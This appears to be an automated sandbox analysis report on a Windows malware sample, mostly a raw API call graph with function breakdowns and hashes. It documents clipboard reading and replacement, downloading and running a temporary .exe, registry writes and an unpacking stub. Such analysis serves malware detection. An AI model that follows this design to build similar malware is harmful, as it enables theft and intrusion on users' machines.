calls std::_Throw_Cpp_error 63839->63893 63842 401109 std::_Cnd_initX 28 API calls 63840->63842 63843 405867 63842->63843 63849 402a14 InternetOpenW 63843->63849 63865 4016e3 63843->63865 63846 40586e Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::ResourceManager::SubscribeCurrentThread 63846->63822 63850 402a47 InternetOpenUrlW 63849->63850 63852 402bbc 63849->63852 63851 402a5d GetTempPathW GetTempFileNameW 63850->63851 63850->63852 63894 42a8ae 63851->63894 63854 40f8f4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 63852->63854 63856 402bcb 63854->63856 63886 40e790 63856->63886 63857 402bab InternetCloseHandle InternetCloseHandle 63857->63852 63858 402ac8 Concurrency::details::ReferenceCountedQuickBitSet::Grow 63859 402ae0 InternetReadFile WriteFile 63858->63859 63860 402b20 CloseHandle 63858->63860 63859->63858 63896 402980 63860->63896 63863 402b4b ShellExecuteExW 63863->63857 63864 402b92 WaitForSingleObject CloseHandle 63863->63864 63864->63857 64004 40fe0b 63865->64004 63867 4016ef Sleep 64005 40cc35 63867->64005 63870 40cc35 28 API calls 63871 401715 63870->63871 63872 40171f OpenClipboard 63871->63872 63873 401947 Sleep 63872->63873 63874 40172f GetClipboardData 63872->63874 63873->63872 63875 401941 CloseClipboard 63874->63875 63876 40173f GlobalLock 63874->63876 63875->63873 63876->63875 63880 40174c _strlen 63876->63880 63877 40cbec 28 API calls std::system_error::system_error 63877->63880 63878 40cc35 28 API calls 63878->63880 63880->63875 63880->63877 63880->63878 63881 4018d6 EmptyClipboard GlobalAlloc 63880->63881 64009 402e8b 167 API calls 2 library calls 63880->64009 64011 40cacb 26 API calls _Deallocate 63880->64011 63881->63880 63883 4018ef GlobalLock 63881->63883 64010 4269b0 63883->64010 63885 401909 GlobalUnlock SetClipboardData GlobalFree 63885->63880 64017 40df0f 63886->64017 63891 40e835 63891->63846 63892 40e7a7 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 64024 40df1b LeaveCriticalSection std::_Lockit::~_Lockit 63892->64024 63893->63840 63895 402a96 CreateFileW 63894->63895 63895->63857 63895->63858 63897 4029ab _wcslen Concurrency::details::ReferenceCountedQuickBitSet::Grow 63896->63897 63906 42b474 63897->63906 63901 4029d8 63928 404358 63901->63928 63904 40f8f4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 63905 402a12 63904->63905 63905->63857 63905->63863 63932 42b126 63906->63932 63909 402843 63910 402852 Concurrency::details::ResourceManager::SubscribeCurrentThread 63909->63910 63958 403302 63910->63958 63912 402866 63974 403bb0 63912->63974 63914 40287a 63915 4028a8 63914->63915 63916 40288c 63914->63916 63980 403137 63915->63980 64001 4032bf 167 API calls 63916->64001 63919 4028b5 63983 403c45 63919->63983 63921 4028c7 63993 403ce7 63921->63993 63923 40289f std::ios_base::_Ios_base_dtor Concurrency::details::ResourceManager::SubscribeCurrentThread 63923->63901 63924 4028e4 63925 404358 26 API calls 63924->63925 63926 402903 63925->63926 64002 4032bf 167 API calls 63926->64002 63929 404360 63928->63929 63930 402a04 63928->63930 64003 40ccbb 26 API calls 2 library calls 63929->64003 63930->63904 63933 42b153 63932->63933 63934 42b157 63933->63934 63935 42b162 63933->63935 63936 42b17a 63933->63936 63939 40f8f4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 63934->63939 63937 42eae9 __Wcrtomb 20 API calls 63935->63937 63938 42a767 __cftoe 162 API calls 63936->63938 63940 42b167 63937->63940 63941 42b185 63938->63941 63942 4029c4 63939->63942 63943 42a5bd _Atexit 26 API calls 63940->63943 63944 42b327 63941->63944 63946 42b190 63941->63946 63942->63909 63943->63934 63945 42b354 WideCharToMultiByte 63944->63945 63948 42b332 63944->63948 63945->63948 63947 42b238 WideCharToMultiByte 63946->63947 63949 42b19b 63946->63949 63955 42b1d5 WideCharToMultiByte 63946->63955 63947->63949 63950 42b263 63947->63950 63948->63934 63951 42eae9 __Wcrtomb 20 API calls 63948->63951 63949->63934 63954 42eae9 __Wcrtomb 20 API calls 63949->63954 63950->63949 63953 42b26c GetLastError 63950->63953 63951->63934 63953->63949 63957 42b27b 63953->63957 63954->63934 63955->63949 63956 42b294 WideCharToMultiByte 63956->63948 63956->63957 63957->63934 63957->63948 63957->63956 63959 40330e Concurrency::details::ResourceManager::SubscribeCurrentThread 63958->63959 63960 4046a1 167 API calls 63959->63960 63961 40333a 63960->63961 63962 404872 167 API calls 63961->63962 63963 403363 63962->63963 63964 4045b1 26 API calls 63963->63964 63965 403372 63964->63965 63966 40de08 167 API calls 63965->63966 63973 4033b7 std::ios_base::_Ios_base_dtor 63965->63973 63967 403387 63966->63967 63970 4045b1 26 API calls 63967->63970 63967->63973 63968 4033f3 Concurrency::details::ResourceManager::SubscribeCurrentThread 63968->63912 63969 40c63d 167 API calls 63969->63968 63971 403398 63970->63971 63972 404c39 167 API calls 63971->63972 63972->63973 63973->63968 63973->63969 63975 403bbc Concurrency::details::ResourceManager::SubscribeCurrentThread 63974->63975 63976 4042d4 167 API calls 63975->63976 63977 403bc8 63976->63977 63978 403bec Concurrency::details::ResourceManager::SubscribeCurrentThread 63977->63978 63979 403520 167 API calls 63977->63979 63978->63914 63979->63978 63981 40437b 28 API calls 63980->63981 63982 403151 Concurrency::details::ReferenceCountedQuickBitSet::Grow 63981->63982 63982->63919 63984 403c51 Concurrency::details::ResourceManager::SubscribeCurrentThread 63983->63984 63985 40c63d 167 API calls 63984->63985 63986 403c74 63985->63986 63987 4042d4 167 API calls 63986->63987 63988 403c7e 63987->63988 63990 403cc1 Concurrency::details::ResourceManager::SubscribeCurrentThread 63988->63990 63992 403520 167 API calls 63988->63992 63989 403c9f 63989->63990 63991 4046ef 167 API calls 63989->63991 63990->63921 63991->63990 63992->63989 63994 403cf3 __EH_prolog3_catch 63993->63994 63995 4042d4 167 API calls 63994->63995 63997 403d0c 63995->63997 63996 4046ef 167 API calls 63999 403d95 Concurrency::details::ResourceManager::SubscribeCurrentThread 63996->63999 63998 403d3c 63997->63998 64000 4036c4 40 API calls 63997->64000 63998->63996 63999->63924 64000->63998 64001->63923 64002->63923 64003->63930 64004->63867 64006 40cc51 _strlen 64005->64006 64012 40cbec 64006->64012 64008 401708 64008->63870 64009->63880 64010->63885 64011->63880 64013 40cbfb BuildCatchObjectHelperInternal 64012->64013 64014 40cc1f 64012->64014 64013->64008 64016 40cb81 28 API calls 4 library calls 64014->64016 64016->64013 64025 40f24f EnterCriticalSection 64017->64025 64019 40df19 64020 40cebe GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 64019->64020 64021 40cef7 64020->64021 64022 40ceec CloseHandle 64020->64022 64023 40cefb GetCurrentThreadId 64021->64023 64022->64023 64023->63892 64024->63891 64025->64019 64035 431f7e GetLastError 64026->64035 64028 42e0a3 ExitThread 64029 42e0c1 64032 42e0d4 64029->64032 64033 42e0cd CloseHandle 64029->64033 64032->64028 64034 42e0e0 FreeLibraryAndExitThread 64032->64034 64033->64032 64036 431f9d 64035->64036 64037 431f97 64035->64037 64038 434d4a __Thrd_start 17 API calls 64036->64038 64042 431ff4 SetLastError 64036->64042 64055 435131 11 API calls 2 library calls 64037->64055 64040 431faf 64038->64040 64041 431fb7 64040->64041 64056 435187 11 API calls 2 library calls 64040->64056 64045 43348a _free 17 API calls 64041->64045 64043 42e09f 64042->64043 64043->64028 64043->64029 64054 435516 10 API calls 2 library calls 64043->64054 64047 431fbd 64045->64047 64046 431fcc 64046->64041 64048 431fd3 64046->64048 64049 431feb SetLastError 64047->64049 64057 431d6c 20 API calls _Atexit 64048->64057 64049->64043 64051 431fde 64052 43348a _free 17 API calls 64051->64052 64053 431fe4 64052->64053 64053->64042 64053->64049 64054->64029 64055->64036 64056->64046 64057->64051 64058->63692 64059 402c24 InternetOpenW 64060 402e7a 64059->64060 64063 402c57 Concurrency::details::ReferenceCountedQuickBitSet::Grow 64059->64063 64061 40f8f4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 64060->64061 64062 402e89 64061->64062 64071 42df1d 64063->64071 64066 42df1d std::_Locinfo::_Locinfo_ctor 26 API calls 64067 402e3c 64066->64067 64068 42df1d std::_Locinfo::_Locinfo_ctor 26 API calls 64067->64068 64069 402e4e InternetOpenUrlW 64068->64069 64069->64060 64070 402e69 InternetCloseHandle InternetCloseHandle 64069->64070 64070->64060 64072 42df2c 64071->64072 64074 42df3a 64071->64074 64072->64074 64078 42df6a 64072->64078 64080 42eae9 20 API calls _Atexit 64074->64080 64075 42df44 64081 42a5bd 26 API calls _Deallocate 64075->64081 64077 402e2e 64077->64066 64078->64077 64082 42eae9 20 API calls _Atexit 64078->64082 64080->64075 64081->64077 64082->64075 64083 4327a5 64088 432573 64083->64088 64086 4327cd 64093 43259e 64088->64093 64090 432791 64107 42a5bd 26 API calls _Deallocate 64090->64107 64092 4326f0 64092->64086 64100 43d03c 64092->64100 64096 4326e7 64093->64096 64103 43c8ee 170 API calls 2 library calls 64093->64103 64095 432731 64095->64096 64104 43c8ee 170 API calls 2 library calls 64095->64104 64096->64092 64106 42eae9 20 API calls _Atexit 64096->64106 64098 432750 64098->64096 64105 43c8ee 170 API calls 2 library calls 64098->64105 64108 43ca11 64100->64108 64102 43d057 64102->64086 64103->64095 64104->64098 64105->64096 64106->64090 64107->64092 64111 43ca1d CallCatchBlock 64108->64111 64109 43ca2b 64126 42eae9 20 API calls _Atexit 64109->64126 64111->64109 64113 43ca64 64111->64113 64112 43ca30 64127 42a5bd 26 API calls _Deallocate 64112->64127 64119 43cfeb 64113->64119 64118 43ca3a __fread_nolock 64118->64102 64129 43f961 64119->64129 64122 43ca88 64128 43cab1 LeaveCriticalSection __wsopen_s 64122->64128 64125 43348a _free 20 API calls 64125->64122 64126->64112 64127->64118 64128->64118 64130 43f984 64129->64130 64131 43f96d 64129->64131 64132 43f9a3 64130->64132 64133 43f98c 64130->64133 64199 42eae9 20 API calls _Atexit 64131->64199 64203 434fca 10 API calls 2 library calls 64132->64203 64201 42eae9 20 API calls _Atexit 64133->64201 64137 43f972 64200 42a5bd 26 API calls _Deallocate 64137->64200 64138 43f991 64202 42a5bd 26 API calls _Deallocate 64138->64202 64139 43f9aa MultiByteToWideChar 64142 43f9d9 64139->64142 64143 43f9c9 GetLastError 64139->64143 64205 4336c7 21 API calls 3 library calls 64142->64205 64204 42eab3 20 API calls 3 library calls 64143->64204 64146 43d001 64146->64122 64153 43d05c 64146->64153 64147 43f9e1 64148 43fa09 64147->64148 64149 43f9e8 MultiByteToWideChar 64147->64149 64150 43348a _free 20 API calls 64148->64150 64149->64148 64151 43f9fd GetLastError 64149->64151 64150->64146 64206 42eab3 20 API calls 3 library calls 64151->64206 64154 43d079 64153->64154 64155 43d0a7 64154->64155 64156 43d08e 64154->64156 64207 43979e 64155->64207 64221 42ead6 20 API calls _Atexit 64156->64221 64159 43d0ac 64160 43d0b5 64159->64160 64161 43d0cc 64159->64161 64223 42ead6 20 API calls _Atexit 64160->64223 64220 43cd2a CreateFileW 64161->64220 64165 43d105 64167 43d182 GetFileType 64165->64167 64169 43d157 GetLastError 64165->64169 64225 43cd2a CreateFileW 64165->64225 64166 43d0ba 64224 42eae9 20 API calls _Atexit 64166->64224 64170 43d18d GetLastError 64167->64170 64171 43d1d4 64167->64171 64226 42eab3 20 API calls 3 library calls 64169->64226 64227 42eab3 20 API calls 3 library calls 64170->64227 64229 4396e7 21 API calls 3 library calls 64171->64229 64175 43d093 64222 42eae9 20 API calls _Atexit 64175->64222 64176 43d19b CloseHandle 64176->64175 64179 43d1c4 64176->64179 64178 43d14a 64178->64167 64178->64169 64228 42eae9 20 API calls _Atexit 64179->64228 64180 43d1f5 64182 43d241 64180->64182 64230 43cf3b 169 API calls 4 library calls 64180->64230 64187 43d26e 64182->64187 64231 43cadd 167 API calls 4 library calls 64182->64231 64183 43d1c9 64183->64175 64186 43d267 64186->64187 64188 43d27f 64186->64188 64232 4335ed 29 API calls 2 library calls 64187->64232 64190 43d029 64188->64190 64191 43d2fd CloseHandle 64188->64191 64190->64125 64233 43cd2a CreateFileW 64191->64233 64193 43d328 64194 43d332 GetLastError 64193->64194 64195 43d277 64193->64195 64234 42eab3 20 API calls 3 library calls 64194->64234 64195->64190 64197 43d33e 64235 4398b0 21 API calls 3 library calls 64197->64235 64199->64137 64200->64146 64201->64138 64202->64146 64203->64139 64204->64146 64205->64147 64206->64148 64208 4397aa CallCatchBlock 64207->64208 64236 42e40d EnterCriticalSection 64208->64236 64211 4397d6 64240 43957d 21 API calls 3 library calls 64211->64240 64213 439821 __fread_nolock 64213->64159 64214 4397b1 64214->64211 64216 439844 EnterCriticalSection 64214->64216 64217 4397f8 64214->64217 64215 4397db 64215->64217 64241 4396c4 EnterCriticalSection 64215->64241 64216->64217 64218 439851 LeaveCriticalSection 64216->64218 64237 4398a7 64217->64237 64218->64214 64220->64165 64221->64175 64222->64190 64223->64166 64224->64175 64225->64178 64226->64175 64227->64176 64228->64183 64229->64180 64230->64182 64231->64186 64232->64195 64233->64193 64234->64197 64235->64195 64236->64214 64242 42e455 LeaveCriticalSection 64237->64242 64239 4398ae 64239->64213 64240->64215 64241->64217 64242->64239 64243 43412a 64244 434136 CallCatchBlock 64243->64244 64245 434142 64244->64245 64246 434159 64244->64246 64277 42eae9 20 API calls _Atexit 64245->64277 64256 42cb1f EnterCriticalSection 64246->64256 64249 434147 64278 42a5bd 26 API calls _Deallocate 64249->64278 64250 434169 64257 4341a6 64250->64257 64253 434175 64279 43419c LeaveCriticalSection __fread_nolock 64253->64279 64255 434152 __fread_nolock 64256->64250 64258 4341b4 64257->64258 64259 4341ce 64257->64259 64290 42eae9 20 API calls _Atexit 64258->64290 64280 432928 64259->64280 64262 4341b9 64291 42a5bd 26 API calls _Deallocate 64262->64291 64264 4341d7 64287 4347f3 64264->64287 64267 4342db 64269 4342e8 64267->64269 64276 43428e 64267->64276 64268 43425f 64271 43427c 64268->64271 64268->64276 64293 42eae9 20 API calls _Atexit 64269->64293 64292 4344bf 31 API calls 4 library calls 64271->64292 64273 434286 64274 4341c4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 64273->64274 64274->64253 64276->64274 64294 43433b 30 API calls 2 library calls 64276->64294 64277->64249 64278->64255 64279->64255 64281 432934 64280->64281 64282 432949 64280->64282 64295 42eae9 20 API calls _Atexit 64281->64295 64282->64264 64284 432939 64296 42a5bd 26 API calls _Deallocate 64284->64296 64286 432944 64286->64264 64297 434670 64287->64297 64289 4341f3 64289->64267 64289->64268 64289->64274 64290->64262 64291->64274 64292->64273 64293->64274 64294->64274 64295->64284 64296->64286 64298 43467c CallCatchBlock 64297->64298 64299 434684 64298->64299 64302 43469c 64298->64302 64332 42ead6 20 API calls _Atexit 64299->64332 64301 434750 64337 42ead6 20 API calls _Atexit 64301->64337 64302->64301 64307 4346d4 64302->64307 64303 434689 64333 42eae9 20 API calls _Atexit 64303->64333 64306 434755 64338 42eae9 20 API calls _Atexit 64306->64338 64322 4396c4 EnterCriticalSection 64307->64322 64310 43475d 64339 42a5bd 26 API calls _Deallocate 64310->64339 64311 4346da 64313 434713 64311->64313 64314 4346fe 64311->64314 64323 434775 64313->64323 64334 42eae9 20 API calls _Atexit 64314->64334 64316 434691 __fread_nolock 64316->64289 64318 434703 64335 42ead6 20 API calls _Atexit 64318->64335 64319 43470e 64336 434748 LeaveCriticalSection __wsopen_s 64319->64336 64322->64311 64340 439941 64323->64340 64325 434787 64326 4347a0 SetFilePointerEx 64325->64326 64327 43478f 64325->64327 64329 434794 64326->64329 64330 4347b8 GetLastError 64326->64330 64353 42eae9 20 API calls _Atexit 64327->64353 64329->64319 64354 42eab3 20 API calls 3 library calls 64330->64354 64332->64303 64333->64316 64334->64318 64335->64319 64336->64316 64337->64306 64338->64310 64339->64316 64341 439963 64340->64341 64342 43994e 64340->64342 64348 439988 64341->64348 64357 42ead6 20 API calls _Atexit 64341->64357 64355 42ead6 20 API calls _Atexit 64342->64355 64344 439953 64356 42eae9 20 API calls _Atexit 64344->64356 64346 439993 64358 42eae9 20 API calls _Atexit 64346->64358 64348->64325 64350 43995b 64350->64325 64351 43999b 64359 42a5bd 26 API calls _Deallocate 64351->64359 64353->64329 64354->64329 64355->64344 64356->64350 64357->64346 64358->64351 64359->64350 64360 4023ba 64361 402581 PostQuitMessage 64360->64361 64362 4023ce 64360->64362 64363 40257f 64361->64363 64364 4023d5 DefWindowProcW 64362->64364 64365 4023ec 64362->64365 64364->64363 64365->64363 64366 402a14 167 API calls 64365->64366 64366->64363 64367 40fc2b 64368 40fc37 CallCatchBlock 64367->64368 64396 410018 64368->64396 64370 40fc3e 64371 40fd91 64370->64371 64374 40fc68 64370->64374 64417 4104f3 4 API calls 2 library calls 64371->64417 64373 40fd98 64418 42ffe9 28 API calls _Atexit 64373->64418 64383 40fca7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 64374->64383 64411 42fd0e 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 64374->64411 64376 40fd9e 64419 42ff9b 28 API calls _Atexit 64376->64419 64379 40fc81 64381 40fc87 64379->64381 64412 42fcb2 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 64379->64412 64380 40fda6 64387 40fd08 64383->64387 64413 42a386 167 API calls 4 library calls 64383->64413 64386 40fd0e 64388 40fd23 64386->64388 64407 41060d 64387->64407 64414 410643 GetModuleHandleW 64388->64414 64390 40fd2a 64390->64373 64391 40fd2e 64390->64391 64392 40fd37 64391->64392 64415 42ff8c 28 API calls _Atexit 64391->64415 64416 4101a7 13 API calls 2 library calls 64392->64416 64395 40fd3f 64395->64381 64397 410021 64396->64397 64420 41079b IsProcessorFeaturePresent 64397->64420 64399 41002d 64421 428847 10 API calls 3 library calls 64399->64421 64401 410032 64402 410036 64401->64402 64422 4317c1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64401->64422 64402->64370 64404 41003f 64405 41004d 64404->64405 64423 428870 8 API calls 3 library calls 64404->64423 64405->64370 64424 426850 64407->64424 64410 410633 64410->64386 64411->64379 64412->64383 64413->64387 64414->64390 64415->64392 64416->64395 64417->64373 64418->64376 64419->64380 64420->64399 64421->64401 64422->64404 64423->64402 64425 410620 GetStartupInfoW 64424->64425 64425->64410 64426 2da9c56 64427 2da9c59 64426->64427 64430 2da9f06 64427->64430 64431 2da9f15 64430->64431 64434 2daa6a6 64431->64434 64435 2daa6c1 64434->64435 64436 2daa6ca CreateToolhelp32Snapshot 64435->64436 64437 2daa6e6 Module32First 64435->64437 64436->64435 64436->64437 64438 2da9f05 64437->64438 64439 2daa6f5 64437->64439 64441 2daa365 64439->64441 64442 2daa390 64441->64442 64443 2daa3d9 64442->64443 64444 2daa3a1 VirtualAlloc 64442->64444 64443->64443 64444->64443 64445 402bcd RegCreateKeyExW 64446 402bfb RegSetValueExW 64445->64446 64447 402c0f 64445->64447 64446->64447 64448 402c14 RegCloseKey 64447->64448 64449 402c1d 64447->64449 64448->64449 64450 4332fe 64451 43330b 64450->64451 64455 433323 64450->64455 64500 42eae9 20 API calls _Atexit 64451->64500 64453 433310 64501 42a5bd 26 API calls _Deallocate 64453->64501 64458 43337e 64455->64458 64464 43331b 64455->64464 64502 434ced 21 API calls 2 library calls 64455->64502 64457 432928 __fread_nolock 26 API calls 64459 433396 64457->64459 64458->64457 64470 432e36 64459->64470 64461 43339d 64462 432928 __fread_nolock 26 API calls 64461->64462 64461->64464 64463 4333c9 64462->64463 64463->64464 64465 432928 __fread_nolock 26 API calls 64463->64465 64466 4333d7 64465->64466 64466->64464 64467 432928 __fread_nolock 26 API calls 64466->64467 64468 4333e7 64467->64468 64469 432928 __fread_nolock 26 API calls 64468->64469 64469->64464 64471 432e42 CallCatchBlock 64470->64471 64472 432e62 64471->64472 64473 432e4a 64471->64473 64475 432f28 64472->64475 64479 432e9b 64472->64479 64569 42ead6 20 API calls _Atexit 64473->64569 64576 42ead6 20 API calls _Atexit 64475->64576 64476 432e4f 64570 42eae9 20 API calls _Atexit 64476->64570 64481 432eaa 64479->64481 64482 432ebf 64479->64482 64480 432f2d 64577 42eae9 20 API calls _Atexit 64480->64577 64571 42ead6 20 API calls _Atexit 64481->64571 64503 4396c4 EnterCriticalSection 64482->64503 64486 432eb7 64578 42a5bd 26 API calls _Deallocate 64486->64578 64487 432eaf 64572 42eae9 20 API calls _Atexit 64487->64572 64488 432ec5 64489 432ee1 64488->64489 64490 432ef6 64488->64490 64573 42eae9 20 API calls _Atexit 64489->64573 64504 432f49 64490->64504 64494 432e57 __fread_nolock 64494->64461 64496 432ee6 64574 42ead6 20 API calls _Atexit 64496->64574 64497 432ef1 64575 432f20 LeaveCriticalSection __wsopen_s 64497->64575 64500->64453 64501->64464 64502->64458 64503->64488 64505 432f73 64504->64505 64506 432f5b 64504->64506 64508 4332dd 64505->64508 64511 432fb8 64505->64511 64588 42ead6 20 API calls _Atexit 64506->64588 64606 42ead6 20 API calls _Atexit 64508->64606 64509 432f60 64589 42eae9 20 API calls _Atexit 64509->64589 64514 432fc3 64511->64514 64517 432f68 64511->64517 64522 432ff3 64511->64522 64513 4332e2 64607 42eae9 20 API calls _Atexit 64513->64607 64590 42ead6 20 API calls _Atexit 64514->64590 64517->64497 64518 432fd0 64608 42a5bd 26 API calls _Deallocate 64518->64608 64519 432fc8 64591 42eae9 20 API calls _Atexit 64519->64591 64523 43300c 64522->64523 64524 433032 64522->64524 64525 43304e 64522->64525 64523->64524 64531 433019 64523->64531 64592 42ead6 20 API calls _Atexit 64524->64592 64595 4336c7 21 API calls 3 library calls 64525->64595 64527 433037 64593 42eae9 20 API calls _Atexit 64527->64593 64579 43d385 64531->64579 64532 433065 64535 43348a _free 20 API calls 64532->64535 64533 43303e 64594 42a5bd 26 API calls _Deallocate 64533->64594 64534 4331b7 64537 43322d 64534->64537 64540 4331d0 GetConsoleMode 64534->64540 64538 43306e 64535->64538 64539 433231 ReadFile 64537->64539 64541 43348a _free 20 API calls 64538->64541 64542 4332a5 GetLastError 64539->64542 64543 43324b 64539->64543 64540->64537 64544 4331e1 64540->64544 64545 433075 64541->64545 64546 4332b2 64542->64546 64547 433209 64542->64547 64543->64542 64548 433222 64543->64548 64544->64539 64549 4331e7 ReadConsoleW 64544->64549 64550 43309a 64545->64550 64551 43307f 64545->64551 64604 42eae9 20 API calls _Atexit 64546->64604 64566 433049 __fread_nolock 64547->64566 64601 42eab3 20 API calls 3 library calls 64547->64601 64562 433270 64548->64562 64563 433287 64548->64563 64548->64566 64549->64548 64554 433203 GetLastError 64549->64554 64598 43480e 64550->64598 64596 42eae9 20 API calls _Atexit 64551->64596 64554->64547 64555 43348a _free 20 API calls 64555->64517 64557 433084 64597 42ead6 20 API calls _Atexit 64557->64597 64558 4332b7 64605 42ead6 20 API calls _Atexit 64558->64605 64602 432c65 31 API calls 3 library calls 64562->64602 64565 43329e 64563->64565 64563->64566 64603 432aa5 29 API calls __fread_nolock 64565->64603 64566->64555 64568 4332a3 64568->64566 64569->64476 64570->64494 64571->64487 64572->64486 64573->64496 64574->64497 64575->64494 64576->64480 64577->64486 64578->64494 64580 43d392 64579->64580 64581 43d39f 64579->64581 64609 42eae9 20 API calls _Atexit 64580->64609 64584 43d3ab 64581->64584 64610 42eae9 20 API calls _Atexit 64581->64610 64583 43d397 64583->64534 64584->64534 64586 43d3cc 64611 42a5bd 26 API calls _Deallocate 64586->64611 64588->64509 64589->64517 64590->64519 64591->64518 64592->64527 64593->64533 64594->64566 64595->64532 64596->64557 64597->64566 64599 434775 __fread_nolock 28 API calls 64598->64599 64600 434824 64599->64600 64600->64531 64601->64566 64602->64566 64603->64568 64604->64558 64605->64566 64606->64513 64607->64518 64608->64517 64609->64583 64610->64586 64611->64583 64612 483003c 64613 4830049 64612->64613 64627 4830e0f SetErrorMode SetErrorMode 64613->64627 64618 4830265 64619 48302ce VirtualProtect 64618->64619 64621 483030b 64619->64621 64620 4830439 VirtualFree 64625 48305f4 LoadLibraryA 64620->64625 64626 48304be 64620->64626 64621->64620 64622 48304e3 LoadLibraryA 64622->64626 64624 48308c7 64625->64624 64626->64622 64626->64625 64628 4830223 64627->64628 64629 4830d90 64628->64629 64630 4830dad 64629->64630 64631 4830dbb GetPEB 64630->64631 64632 4830238 VirtualAlloc 64630->64632 64631->64632 64632->64618

                                                                                  Executed Functions

                                                                                  Function 004016E3 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150clipboardsleepmemoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 004016EA
                                                                                  • Sleep.KERNEL32(000011EB,0000004C), ref: 004016F4
                                                                                    • Part of subcall function 0040CC35: _strlen.LIBCMT ref: 0040CC4C
                                                                                  • OpenClipboard.USER32(00000000), ref: 00401721
                                                                                  • GetClipboardData.USER32(00000001), ref: 00401731
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00401740
                                                                                  • _strlen.LIBCMT ref: 0040174D
                                                                                  • _strlen.LIBCMT ref: 0040177C
                                                                                  • _strlen.LIBCMT ref: 004018C0
                                                                                  • EmptyClipboard.USER32 ref: 004018D6
                                                                                  • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018E3
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00401901
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040190D
                                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00401916
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0040191D
                                                                                  • CloseClipboard.USER32 ref: 00401941
                                                                                  • Sleep.KERNEL32(000002C7), ref: 0040194C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                  • String ID: i
                                                                                  • API String ID: 1583243082-3865851505
                                                                                  • Opcode ID: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                                                  • Instruction ID: e8206cc808b01b97a457829c5c6b97d93370119956ebdbcfeaa79ca2656f34e0
                                                                                  • Opcode Fuzzy Hash: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                                                  • Instruction Fuzzy Hash: EE51E431D00344DBE3119BA4ED46BAD7774FF2A306F04523AE805B62B2EB789A85C75D
                                                                                  Function 00402A14 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134networkfilesynchronizationCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A37
                                                                                  • InternetOpenUrlW.WININET(00000000,0045D830,00000000,00000000,00000000,00000000), ref: 00402A4D
                                                                                  • GetTempPathW.KERNEL32(00000105,?), ref: 00402A69
                                                                                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A7F
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402AB8
                                                                                  • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AF4
                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402B11
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00402B27
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00402B88
                                                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B9D
                                                                                  • CloseHandle.KERNEL32(?), ref: 00402BA9
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00402BB2
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00402BB5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                  • String ID: .exe$<$ShareScreen
                                                                                  • API String ID: 3323492106-493228180
                                                                                  • Opcode ID: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                                                  • Instruction ID: d8cef6b8be2db64f00d3760719452557403e9faa7f5bbaccd6a49820079d0072
                                                                                  • Opcode Fuzzy Hash: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                                                  • Instruction Fuzzy Hash: 3E41537190021CAEEB20DF50DD85FEAB7BCFF05745F0080FAA545A2190DEB49E858FA4
                                                                                  Function 02DAA6A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02DAA6CE
                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 02DAA6EE
                                                                                  Memory Dump Source
